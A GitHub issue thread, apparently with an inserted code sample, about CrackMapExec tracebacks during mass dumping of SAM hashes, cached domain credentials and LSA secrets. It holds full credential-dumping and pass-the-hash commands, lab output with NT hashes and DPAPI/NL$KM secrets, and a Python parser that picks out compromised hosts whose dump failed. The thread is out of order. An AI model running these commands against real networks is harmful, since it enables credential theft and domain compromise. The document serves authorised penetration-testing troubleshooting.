Closed juushya closed 8 years ago
@juushya can you please give me the command string you ran? thanks!
Sure.
./crackmapexec.py X.X.X.X -d DOMAIN -u domainadmin -p password --lsa --sam
Were you using the latest version? Just tried it and it works for me:
#~ sudo crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' --sam --lsa
06-05-2016 13:42:32 CME 192.168.10.11:445 WIN7BOX [*] Windows 6.1 Build 7601 (name:WIN7BOX) (domain:LAB)
06-05-2016 13:42:32 CME 192.168.10.11:445 WIN7BOX [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
06-05-2016 13:42:33 CME 192.168.10.11:445 WIN7BOX [+] Dumping local SAM hashes (uid:rid:lmhash:nthash)
06-05-2016 13:42:34 CME 192.168.10.11:445 WIN7BOX Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
06-05-2016 13:42:34 CME 192.168.10.11:445 WIN7BOX Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
06-05-2016 13:42:34 CME 192.168.10.11:445 WIN7BOX shazam:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
06-05-2016 13:42:36 CME 192.168.10.11:445 WIN7BOX [+] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
06-05-2016 13:42:36 CME 192.168.10.11:445 WIN7BOX yomama:4796a2aba0d3663e308939f43b157cad:LAB.LOCAL:LAB:::
06-05-2016 13:42:37 CME 192.168.10.11:445 WIN7BOX Administrator:dfb35a65f92d8af602f08e358a58dc42:LAB.LOCAL:LAB:::
06-05-2016 13:42:38 CME 192.168.10.11:445 WIN7BOX [+] Dumping LSA Secrets
06-05-2016 13:42:38 CME 192.168.10.11:445 WIN7BOX LAB\WIN7BOX$:aad3b435b51404eeaad3b435b51404ee:00d4ccabafb8a38a99ca6d35914c32b2:::
06-05-2016 13:42:39 CME 192.168.10.11:445 WIN7BOX DPAPI_SYSTEM:01000000b2936dbe72c61fc172ee2d73d74c4bb3df817b638fb10cefb2192b7d53310d21e32867fdac235c13
06-05-2016 13:42:39 CME 192.168.10.11:445 WIN7BOX NL$KM:d8ba73d489664670cc001c92a9a7c6b5f5521d2842e152152bab07afdd2ac8c9f22d04e778dd3dd30f580ed7b5d960af50fcaf57a071f25d92ba5f972a901c62
06-05-2016 13:42:39 [*] KTHXBYE!
Try installing the latest version from github and try again
Yes, using the latest version. These tracebacks were seen to occur for a few hosts only (Win 2K3 and Win 2k8), not for all hosts...
So, I've tried this on a Win 2k8 box and it works fine, I'll see if I can get my hands on a Win 2k3 image. In the meantime though, I'm closing this since I cannot reproduce.
I know this is a very old issue, but I just received a stacktrace very similar to the third one, so I wanted to add my experience to this.
The stacktrace reads
Traceback (most recent call last):
File "/usr/local/lib/python3.9/dist-packages/impacket/smbconnection.py", line 384, in connectTree
return self._SMBConnection.connect_tree(share)
File "/usr/local/lib/python3.9/dist-packages/impacket/smb3.py", line 1025, in connectTree
if packet.isValidAnswer(STATUS_SUCCESS):
File "/usr/local/lib/python3.9/dist-packages/impacket/smb3structs.py", line 454, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/bin/cme", line 33, in <module>
sys.exit(load_entry_point('crackmapexec==5.1.7.dev0', 'console_scripts', 'crackmapexec')())
File "/usr/lib/python3/dist-packages/cme/crackmapexec.py", line 272, in main
asyncio.run(
File "/usr/lib/python3.9/asyncio/runners.py", line 44, in run
return loop.run_until_complete(main)
File "/usr/lib/python3.9/asyncio/base_events.py", line 642, in run_until_complete
return future.result()
File "/usr/lib/python3/dist-packages/cme/crackmapexec.py", line 102, in start_threadpool
await asyncio.gather(*jobs)
File "/usr/lib/python3/dist-packages/cme/crackmapexec.py", line 68, in run_protocol
await asyncio.wait_for(
File "/usr/lib/python3.9/asyncio/tasks.py", line 442, in wait_for
return await fut
File "/usr/lib/python3.9/concurrent/futures/thread.py", line 58, in run
result = self.fn(*self.args, **self.kwargs)
File "/usr/lib/python3/dist-packages/cme/protocols/smb.py", line 121, in __init__
connection.__init__(self, args, db, host)
File "/usr/lib/python3/dist-packages/cme/connection.py", line 59, in __init__
self.proto_flow()
File "/usr/lib/python3/dist-packages/cme/connection.py", line 99, in proto_flow
self.call_cmd_args()
File "/usr/lib/python3/dist-packages/cme/connection.py", line 106, in call_cmd_args
getattr(self, k)()
File "/usr/lib/python3/dist-packages/cme/connection.py", line 30, in _decorator
return func(self, *args, **kwargs)
File "/usr/lib/python3/dist-packages/cme/protocols/smb.py", line 944, in sam
SAMFileName = self.remote_ops.saveSAM()
File "/usr/local/lib/python3.9/dist-packages/impacket/examples/secretsdump.py", line 795, in saveSAM
return self.__retrieveHive('SAM')
File "/usr/local/lib/python3.9/dist-packages/impacket/examples/secretsdump.py", line 790, in __retrieveHive
remoteFileName = RemoteFile(self.__smbConnection, 'SYSTEM32\\'+tmpFileName)
File "/usr/local/lib/python3.9/dist-packages/impacket/examples/secretsdump.py", line 298, in __init__
self.__tid = self.__smbConnection.connectTree('ADMIN$')
File "/usr/local/lib/python3.9/dist-packages/impacket/smbconnection.py", line 386, in connectTree
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)
The stacktrace of secretsdump.py is pretty clear. This happens because no ADMIN$ share is available on the target and indeed, a share listing shows that only IPC$ is enabled on this host (and a few others on the network I am currently testing).
I suppose this is an upstream bug in secretsdump.py?
I am however not using the most recent cme version (still running with 5.1.7dev on my default pentest Kali image; I should really configure the porchetta repository there...) and as I am currently short on time I cannot check if this might be fixed in the latest release.
Try with secretsdump; if you get the same error then this is related to impacket.
secretsdump handles this error more gracefully.
# secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:<HASH> Administrator@<IP>
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: <REDACTED>
[-] SAM hashes extraction failed: SMB SessionError: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)
[-] LSA hashes extraction failed: SMB SessionError: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)
[*] Cleaning up...
[*] Stopping service RemoteRegistry
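Added example (not part of this thread, and not CME or impacket code): when mass-dumping as described above, a crashed host leaves no "[+] Dumping ..." sections in the CME output and only a bare traceback whose last line carries the NTSTATUS name. The parser below reads CME log lines in the format shown earlier in the thread, records per host which of the SAM / cached-credential / LSA sections actually started, collects NTSTATUS names from traceback or secretsdump-style lines that have no host prefix, and lists the hosts that were Pwn3d but never got a dump, i.e. the ones to re-run with secretsdump.py or to check for a missing ADMIN$ share. The sample input is constructed: the WIN7BOX lines are the ones from this thread, the SRV2K3 host and its truncated traceback are hypothetical, and the 2016 date/time stamps are reused for convenience. It also flags SAM accounts whose NT hash is the well-known empty-password value.

```python
import re
from dataclasses import dataclass, field

# CME 3.x log line as shown in this thread:
#   "06-05-2016 13:42:34 CME 192.168.10.11:445 WIN7BOX <payload>"
CME_LINE = re.compile(
    r"^\S+ \S+ CME (?P<ip>[\d.]+):(?P<port>\d+) (?P<host>\S+) (?P<payload>.*)$"
)
# SAM record: user:rid:lmhash:nthash:::
SAM_RECORD = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)
# NTSTATUS names as they appear in impacket SessionError messages.
NTSTATUS = re.compile(r"STATUS_[A-Z_]+")
# Section headers CME prints before each group of records.
SECTION_HEADERS = {
    "Dumping local SAM hashes": "sam",
    "Dumping cached domain logon information": "cached",
    "Dumping LSA Secrets": "lsa",
}
# NT hash of the empty password (MD4 of ""), well known.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"


@dataclass
class HostReport:
    ip: str
    host: str
    admin: bool = False
    sections: dict = field(default_factory=dict)  # section -> record lines
    errors: list = field(default_factory=list)    # NTSTATUS names on host-tagged lines

    def missing(self):
        """Dump sections that never started for this host."""
        return [s for s in SECTION_HEADERS.values() if s not in self.sections]


def parse_cme(text):
    """Return ({host: HostReport}, [NTSTATUS names on lines without a host prefix])."""
    reports, orphan_errors, current = {}, [], {}
    for line in text.splitlines():
        m = CME_LINE.match(line)
        if not m:
            # Traceback tail or secretsdump.py output: keep the NTSTATUS name only.
            status = NTSTATUS.search(line)
            if status:
                orphan_errors.append(status.group())
            continue
        host, payload = m.group("host"), m.group("payload")
        rep = reports.setdefault(host, HostReport(m.group("ip"), host))
        if payload.startswith("["):
            if "(Pwn3d!)" in payload:
                rep.admin = True
            for header, name in SECTION_HEADERS.items():
                if header in payload:
                    rep.sections[name] = []
                    current[host] = name
            status = NTSTATUS.search(payload)
            if status:
                rep.errors.append(status.group())
        elif host in current:
            rep.sections[current[host]].append(payload)
    return reports, orphan_errors


def needs_followup(reports):
    """Hosts with admin access where at least one dump section never ran."""
    return {h: r.missing() for h, r in reports.items() if r.admin and r.missing()}


def empty_password_accounts(report):
    """SAM users whose NT hash is the empty-password hash (blank or often a disabled account)."""
    users = []
    for rec in report.sections.get("sam", []):
        m = SAM_RECORD.match(rec)
        if m and m.group("nt") == EMPTY_NT:
            users.append(m.group("user"))
    return users


# Constructed sample: WIN7BOX lines from the thread, SRV2K3 is hypothetical.
SAMPLE = r"""06-05-2016 13:42:32 CME 192.168.10.11:445 WIN7BOX [*] Windows 6.1 Build 7601 (name:WIN7BOX) (domain:LAB)
06-05-2016 13:42:32 CME 192.168.10.11:445 WIN7BOX [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
06-05-2016 13:42:33 CME 192.168.10.11:445 WIN7BOX [+] Dumping local SAM hashes (uid:rid:lmhash:nthash)
06-05-2016 13:42:34 CME 192.168.10.11:445 WIN7BOX Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
06-05-2016 13:42:34 CME 192.168.10.11:445 WIN7BOX Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
06-05-2016 13:42:34 CME 192.168.10.11:445 WIN7BOX shazam:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
06-05-2016 13:42:36 CME 192.168.10.11:445 WIN7BOX [+] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
06-05-2016 13:42:36 CME 192.168.10.11:445 WIN7BOX yomama:4796a2aba0d3663e308939f43b157cad:LAB.LOCAL:LAB:::
06-05-2016 13:42:37 CME 192.168.10.11:445 WIN7BOX Administrator:dfb35a65f92d8af602f08e358a58dc42:LAB.LOCAL:LAB:::
06-05-2016 13:42:38 CME 192.168.10.11:445 WIN7BOX [+] Dumping LSA Secrets
06-05-2016 13:42:38 CME 192.168.10.11:445 WIN7BOX LAB\WIN7BOX$:aad3b435b51404eeaad3b435b51404ee:00d4ccabafb8a38a99ca6d35914c32b2:::
06-05-2016 13:42:39 CME 192.168.10.11:445 WIN7BOX DPAPI_SYSTEM:01000000b2936dbe72c61fc172ee2d73d74c4bb3df817b638fb10cefb2192b7d53310d21e32867fdac235c13
06-05-2016 13:42:39 CME 192.168.10.11:445 WIN7BOX NL$KM:d8ba73d489664670cc001c92a9a7c6b5f5521d2842e152152bab07afdd2ac8c9f22d04e778dd3dd30f580ed7b5d960af50fcaf57a071f25d92ba5f972a901c62
06-05-2016 13:42:40 CME 192.168.10.12:445 SRV2K3 [*] Windows 5.2 Build 3790 (name:SRV2K3) (domain:LAB)
06-05-2016 13:42:40 CME 192.168.10.12:445 SRV2K3 [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
Traceback (most recent call last):
  ...
impacket.smbconnection.SessionError: SMB SessionError: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)
06-05-2016 13:42:41 [*] KTHXBYE!
"""

if __name__ == "__main__":
    reports, orphans = parse_cme(SAMPLE)
    for host, rep in reports.items():
        print(host, "admin" if rep.admin else "no-admin", "missing:", rep.missing(),
              "empty-NT:", empty_password_accounts(rep))
    print("follow up:", needs_followup(reports), "untagged errors:", orphans)
```

Feed it the captured stdout of a mass run (`cme ... --sam --lsa | tee dump.log`); secretsdump.py's own "[-] SAM hashes extraction failed: ... STATUS_BAD_NETWORK_NAME" lines land in the untagged-error list the same way the traceback tail does, since neither carries the CME host prefix.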
Hey,
I am (mass) dumping sam + cached creds + lsa secrets from local boxes, using Domain Admin creds. In some cases, after dumping sam, CME throws the following traceback:
In some cases, the following second traceback is seen:
In other cases, the following third traceback is thrown immediately at start of sam dump (sam + cached creds + lsa secrets do not get dumped):
Domain Cached creds and lsa secrets do not get dumped.
Thanks.